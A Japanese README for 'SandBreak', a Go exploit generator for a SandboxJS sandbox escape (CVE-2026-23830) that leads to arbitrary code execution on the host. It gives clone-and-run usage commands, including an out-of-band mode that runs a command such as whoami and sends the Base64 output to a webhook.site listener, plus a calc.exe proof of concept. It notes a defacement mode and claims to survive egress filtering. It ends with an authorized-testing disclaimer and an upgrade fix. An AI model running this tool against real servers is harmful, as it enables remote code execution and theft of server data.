
CVE-2026-23830(SandboxJSエスケープ)用のエクスプロイトペイロードを生成・配信し、ブラインドOOB外部送信とローカルcalc PoCのモードを備えています。HTTP/HTTPSリスナーをサポートし、圧縮されたJavaScriptペイロードを生成します。
SandBreak は、SandboxJSエスケープ脆弱性(CVE-2026-23830) を悪用するために設計された、堅牢なGoベースのエクスプロイト生成ツールです。
このツールは、古いバージョンの sandboxjs における保護されていない AsyncFunction コンストラクタを悪用し、攻撃者がV8サンドボックス環境から脱出してホストシステム上で任意のコードを実行できるようにします。Blind OOB Exfiltration、Defacement、Error-Based RCE を含む複数のペイロードモードをサポートしています。
oob: ブラインドシナリオ向けのOut-of-Bandデータ流出(HTTP/HTTPS)。calc: calc.exe を起動(クラシックなPoC)。リポジトリをクローンして実行します:
git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
cd CVE-2026-23830-SandBreak
go run CVE-2026-23830.go
go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]
出力フィードバックがない場合に使用します。コマンドを実行し、Base64エンコードされた結果をリスナー(例: webhook.site)に送信します。
go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"
ネットワークエラーを処理することで、基本的なエグレスフィルタリングのクラッシュを正常に回避します。
Windowsサーバー上で電卓を起動します。
go run CVE-2026-23830.go -mode calc
サイト上に視覚的な出力がないにもかかわらず、攻撃者がWebhook経由でサーバーのユーザーデータを受信している様子。
このツールは教育目的および許可されたペネトレーションテスト専用に作成されています。
AsyncFunction コンストラクタが適切にサンドボックス化された最新バージョンに sandboxjs をアップグレードしてください。
npm update sandboxjs
作者: Meysam Bal-afkan
ライセンス: MIT